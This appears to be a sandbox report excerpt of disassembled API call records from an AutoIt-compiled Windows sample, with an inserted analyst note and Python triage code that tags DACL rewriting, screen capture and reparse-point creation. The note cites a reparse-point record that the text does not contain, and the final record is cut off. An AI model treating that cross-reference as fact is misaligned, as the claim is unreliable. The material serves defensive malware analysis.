                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: fe1f5f2cb3bc54bfb50d94ce7be4e20f545469b2660bd9f384cb4d2d466051d3
                    • Instruction ID: 025a22a0ea4099b32e5b79c21377259a13de87da114c990d98bc4609bd9d6091
                    • Opcode Fuzzy Hash: fe1f5f2cb3bc54bfb50d94ce7be4e20f545469b2660bd9f384cb4d2d466051d3
                    • Instruction Fuzzy Hash: E861F7F2500215AFDB20AFA4D842BE97BA7EF12321F14421EE8119B291DB39DDC1CB56
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0070C4EC
                    • GetFocus.USER32 ref: 0070C4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 0070C507
                    • _memset.LIBCMT ref: 0070C632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0070C65D
                    • GetMenuItemCount.USER32(?), ref: 0070C67D
                    • GetMenuItemID.USER32(?,00000000), ref: 0070C690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0070C6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0070C70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0070C744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0070C779
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 12490f641d1d64b019d49e1f54b01933fb95fcfd77b440dcb17442ac77a29d46
                    • Instruction ID: a371aa74ae79485c4fa62c8c82e4fe493168af3a295824246d8a78eb4157bef4
                    • Opcode Fuzzy Hash: 12490f641d1d64b019d49e1f54b01933fb95fcfd77b440dcb17442ac77a29d46
                    • Instruction Fuzzy Hash: FB818A70208301DFD722DF14C984A6BBBE9EB89314F10472EF99597291DB79E905CFA2
                    APIs
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                      • Part of subcall function 006D874A: GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                      • Part of subcall function 006D874A: GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                      • Part of subcall function 006D874A: HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                      • Part of subcall function 006D87E7: GetProcessHeap.KERNEL32(00000008,006D8240,00000000,00000000,?,006D8240,?), ref: 006D87F3
                      • Part of subcall function 006D87E7: HeapAlloc.KERNEL32(00000000,?,006D8240,?), ref: 006D87FA
                      • Part of subcall function 006D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006D8240,?), ref: 006D880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D8458
                    • _memset.LIBCMT ref: 006D846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D848C
                    • GetLengthSid.ADVAPI32(?), ref: 006D849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 006D84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D84F6
                    • GetLengthSid.ADVAPI32(?), ref: 006D8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006D8522
                    • HeapAlloc.KERNEL32(00000000), ref: 006D8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D854A
                    • CopySid.ADVAPI32(00000000), ref: 006D8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 76dcadab8d949e0ce6f9c21e4c6491b1802566d91dcf4caba4d3731d74830896
                    • Instruction ID: 6dc164771e2a4247c7406347e45b7a85cce86e76314ad226f0512c4d6630ac03
                    • Opcode Fuzzy Hash: 76dcadab8d949e0ce6f9c21e4c6491b1802566d91dcf4caba4d3731d74830896
                    • Instruction Fuzzy Hash: 51612971D00209EFDB10DF95EC49AEEBBBABB04310B04826AE815A7391DB359A05CB64
                    APIs
                    • GetDC.USER32(00000000), ref: 006F76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006F76AE
                    • CreateCompatibleDC.GDI32(?), ref: 006F76BA
                    • SelectObject.GDI32(00000000,?), ref: 006F76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006F771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006F7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006F777B
                    • SelectObject.GDI32(00000006,?), ref: 006F7783
                    • DeleteObject.GDI32(?), ref: 006F778C
                    • DeleteDC.GDI32(00000006), ref: 006F7793
                    • ReleaseDC.USER32(00000000,?), ref: 006F779E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 2659e0b31fd31726555dfc588fb4cd2092c90e9cefc15de7431ab1c63172c533
                    • Instruction ID: 1a26c1f86e22131ad320474203320dc3cf09322ad5f178f918353fb6031d37d7
                    • Opcode Fuzzy Hash: 2659e0b31fd31726555dfc588fb4cd2092c90e9cefc15de7431ab1c63172c533
                    • Instruction Fuzzy Hash: CE515B75904209EFDB25CFA8CC84EAEBBBAEF48310F14852DFA4997310D735A940CB64
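Analyst note on three of the records above (added here as editorial example code; it is not part of the Joe Sandbox report, the IDA plugin, or the sample). The CreateFileW/DeviceIoControl sequence at 006EA47A to 006EA5AC opens a directory it has just created with 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) and issues control code 000900A4 (FSCTL_SET_REPARSE_POINT) with a "\??\%s" target, i.e. it writes a junction or symbolic link. The GetUserObjectSecurity/AddAce/SetUserObjectSecurity sequence at 006D8458 to 006D85BC reads and rewrites the DACL (security information 00000004 = DACL_SECURITY_INFORMATION) of a user object, which is consistent with opening a window station or desktop to another account before a run-as-user launch. The GetDC/CreateCompatibleBitmap/StretchBlt/GetDIBits sequence at 006F76A2 to 006F779E copies screen pixels into a DIB. All three are part of the AutoIt runtime that is statically present in this image (the AU3! and >>>AUTOIT SCRIPT<<< parser record further down is from the same dump), so they show what the interpreter can do, not that the embedded script calls them; check the report's behaviour sections before attributing any of them to the payload. The Python below parses records in the format printed on this page, decodes the constants and tags each record with the capability it evidences. The sample input is a subset of lines copied from those three records; the tag names and the CTL_CODE field split are this example's own choices.

```python
import re
from typing import Dict, List, Set, Union

# Win32 constants the checks below compare against (values from the SDK headers).
FSCTL_SET_REPARSE_POINT = 0x000900A4
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
DACL_SECURITY_INFORMATION = 0x00000004

# One "APIs" line of a Joe Sandbox IDA-plugin record. The three shapes seen on the page:
#   • CreateFileW.KERNEL32(?,40000000,...,02200000,00000000), ref: 006EA4FE
#   • GetDriveTypeW.KERNEL32 ref: 006EA683                      (no argument list)
#   • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(...), ref: 006D8766
API_LINE = re.compile(
    r"^\s*\u2022?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]


def parse_arg(token: str) -> Arg:
    """'?' is a value the plugin could not resolve; hex tokens become ints; other text is kept."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_calls(record: str) -> List[Dict]:
    """Parse the API lines of one record; headings, hashes and other lines are skipped."""
    calls = []
    for line in record.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append({"name": m["name"], "module": m["module"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["parent"] is not None})
    return calls


def decode_ioctl(code: int) -> Dict[str, int]:
    """Split a CTL_CODE value into device type, required access, function number and method."""
    return {"device": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3}


def arg(call: Dict, index: int) -> Arg:
    return call["args"][index] if index < len(call["args"]) else None


def classify(calls: List[Dict]) -> Set[str]:
    """Tag a record with the capability its call sequence evidences (tag names are ours)."""
    names = {c["name"] for c in calls}
    tags: Set[str] = set()
    opens_reparse = any(c["name"] == "CreateFileW" and isinstance(arg(c, 5), int)
                        and arg(c, 5) & FILE_FLAG_OPEN_REPARSE_POINT for c in calls)
    sets_reparse = any(c["name"] == "DeviceIoControl" and arg(c, 1) == FSCTL_SET_REPARSE_POINT
                       for c in calls)
    if opens_reparse and sets_reparse:
        tags.add("reparse-point-create")      # junction/symlink written onto a directory
    dacl_info = any(c["name"] in ("GetUserObjectSecurity", "SetUserObjectSecurity")
                    and arg(c, 1) == DACL_SECURITY_INFORMATION for c in calls)
    if dacl_info and {"AddAce", "SetUserObjectSecurity"} <= names:
        tags.add("user-object-dacl-rewrite")  # ACE appended to a window station/desktop DACL
    if {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"} <= names:
        tags.add("screen-capture")
    return tags


# Sample input: lines copied from three records of this report (a subset of each record).
SAMPLES = {
    "reparse (006EA47A)": """\
• CreateDirectoryW.KERNEL32(?,00000000), ref: 006EA4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006EA4FE
• _wcsncpy.LIBCMT ref: 006EA559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006EA58E
• CloseHandle.KERNEL32(00000000), ref: 006EA599
""",
    "dacl (006D8458)": """\
  • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D8458
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D84F6
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D85A8
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D85BC
""",
    "screen (006F76A2)": """\
• GetDC.USER32(00000000), ref: 006F76A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006F76AE
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006F771B
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006F777B
""",
}


def triage(records: Dict[str, str]) -> Dict[str, Set[str]]:
    return {label: classify(parse_calls(text)) for label, text in records.items()}


if __name__ == "__main__":
    for label, tags in triage(SAMPLES).items():
        print(f"{label}: {sorted(tags)}")
    print("FSCTL_SET_REPARSE_POINT ->", decode_ioctl(FSCTL_SET_REPARSE_POINT))
```

Feed it a whole record copied from this page and it ignores the hash and Memory Dump Source lines; the capability tags are deliberately conservative (the reparse tag needs both the open flag and the FSCTL, not just DeviceIoControl), since these sequences are library code and a looser match would fire on every AutoIt-compiled binary.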
                    APIs
                      • Part of subcall function 006A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00686C6C,?,00008000), ref: 006A0BB7
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00686D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00686E5A
                      • Part of subcall function 006859CD: _wcscpy.LIBCMT ref: 00685A05
                      • Part of subcall function 006A387D: _iswctype.LIBCMT ref: 006A3885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 732c2f9198bc10ba39262c5339aacfba32607520d34de27807cabdfe26c939b5
                    • Instruction ID: a4bc700adc51348820c88c8d5c2d88fce6687a3ceb06df2ed9f566ab34cb4c12
                    • Opcode Fuzzy Hash: 732c2f9198bc10ba39262c5339aacfba32607520d34de27807cabdfe26c939b5
                    • Instruction Fuzzy Hash: 4802AD701083419FC764EF24C881AEFBBE6BF99354F144A1DF486972A2DB31D989CB46
                    APIs
                    • _memset.LIBCMT ref: 006845F9
                    • GetMenuItemCount.USER32(00746890), ref: 006BD7CD
                    • GetMenuItemCount.USER32(00746890), ref: 006BD87D
                    • GetCursorPos.USER32(?), ref: 006BD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 006BD8CA
                    • TrackPopupMenuEx.USER32(00746890,00000000,?,00000000,00000000,00000000), ref: 006BD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006BD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 6bd40d83eb1f8e4af383aceae6bfad9c34844f6d541589652c3df89a0c861656
                    • Instruction ID: 4932b8771b46b45ae77f02cf34873bc4a7e47bfbb3e670e7a4641d6540d0bd4d
                    • Opcode Fuzzy Hash: 6bd40d83eb1f8e4af383aceae6bfad9c34844f6d541589652c3df89a0c861656
                    • Instruction Fuzzy Hash: BF7104B0601216BAEB309F14DC45FEABF66FF05364F204326F514AA2E0DFB558A0DB94
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006F8BEC
                    • CoInitialize.OLE32(00000000), ref: 006F8C19
                    • CoUninitialize.OLE32 ref: 006F8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 006F8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 006F8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00712C0C), ref: 006F8E84
                    • CoGetObject.OLE32(?,00000000,00712C0C,?), ref: 006F8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 006F8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006F8F3A
                    • VariantClear.OLEAUT32(?), ref: 006F8F4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,q
                    • API String ID: 2395222682-3492105362
                    • Opcode ID: b42ec48aaa25e7934171711c766c7b9cfcb37ab10252e64e8be62a1902deaa47
                    • Instruction ID: d4330b1dfc3f6dc8166d2902a4cc2cdfb0e66e34f5810d26431347b5baf12aee
                    • Opcode Fuzzy Hash: b42ec48aaa25e7934171711c766c7b9cfcb37ab10252e64e8be62a1902deaa47
                    • Instruction Fuzzy Hash: 1BC12571604309AFD700EF64C88496BB7EAFF88748F04496DF6899B251DB71ED06CB62
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 077f81b1908018ef44c2baa9e17829a24a1dcfdb425b421b42498599cec25362
                    • Instruction ID: 39a9a273076effb39ea1ed6a75be510e7c747e9b6ef0c3be67f5bd094153e2b9
                    • Opcode Fuzzy Hash: 077f81b1908018ef44c2baa9e17829a24a1dcfdb425b421b42498599cec25362
                    • Instruction Fuzzy Hash: 0541627124024ECBEF14FF90DD91AEA37A5BF16340F904668FD915B292DB38AD1ACB50
                    APIs
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 00687A84: _memmove.LIBCMT ref: 00687B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006E55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006E55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006E55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006E560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006E561C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: d87c8c80fffda66c5b2523c8d75d71f647922dcd127de0b76996a9ecf1c7ad32
                    • Instruction ID: 56cda975786b40d39fb3f3c2c90991be3e66f506123b644014f31e332b9480d8
                    • Opcode Fuzzy Hash: d87c8c80fffda66c5b2523c8d75d71f647922dcd127de0b76996a9ecf1c7ad32
                    • Instruction Fuzzy Hash: E81104605902A979E720B662CC8ACFF7B7DEF91F00F40052DB445A20D2DE644D05CAA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 8e3e4e7548143e734ca96b63771e1a2f805787208f3bbb3a1c07d236037c6ed6
                    • Instruction ID: 1bf85962cd927e3b515e0a8598abb398339b59541bca3d2a40a2daf0226bb4cc
                    • Opcode Fuzzy Hash: 8e3e4e7548143e734ca96b63771e1a2f805787208f3bbb3a1c07d236037c6ed6
                    • Instruction Fuzzy Hash: 3811D531904215EFCB20EB359C4AEDB77AD9F41710F0442B9F445A6192EF749E818A65
                    APIs
                    • timeGetTime.WINMM ref: 006E521C
                      • Part of subcall function 006A0719: timeGetTime.WINMM(?,75C0B400,00690FF9), ref: 006A071D
                    • Sleep.KERNEL32(0000000A), ref: 006E5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 006E526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006E528E
                    • SetActiveWindow.USER32 ref: 006E52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006E52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006E52DA
                    • Sleep.KERNEL32(000000FA), ref: 006E52E5
                    • IsWindow.USER32 ref: 006E52F1
                    • EndDialog.USER32(00000000), ref: 006E5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 76b6bf681e0b66170366a5ecc26f2e1d29e3151e9f5354ba6355cda2c56b5ecd
                    • Instruction ID: bfff86a443691b454fe039e4f9e360426f1791a3142c562131bd730bd1dc6d60
                    • Opcode Fuzzy Hash: 76b6bf681e0b66170366a5ecc26f2e1d29e3151e9f5354ba6355cda2c56b5ecd
                    • Instruction Fuzzy Hash: 6321D774205744EFE7105F21EC88A267B6AFB4634AF008529F102866B1DFA99D10CB6A
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CoInitialize.OLE32(00000000), ref: 006ED855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006ED8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 006ED8FC
                    • CoCreateInstance.OLE32(00712D7C,00000000,00000001,0073A89C,?), ref: 006ED948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006ED9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 006EDA0F
                    • _memset.LIBCMT ref: 006EDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 006EDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006EDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 006EDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006EDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 006EDAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: c9480cd237a87b97ad5c3e2d6e217aacdb478a5a893891dc4882abc6d54ab958
                    • Instruction ID: aff50f1a917a41fd3c6b0e7be29e1ce1e9d10d69d5430d48053918c0041cac88
                    • Opcode Fuzzy Hash: c9480cd237a87b97ad5c3e2d6e217aacdb478a5a893891dc4882abc6d54ab958
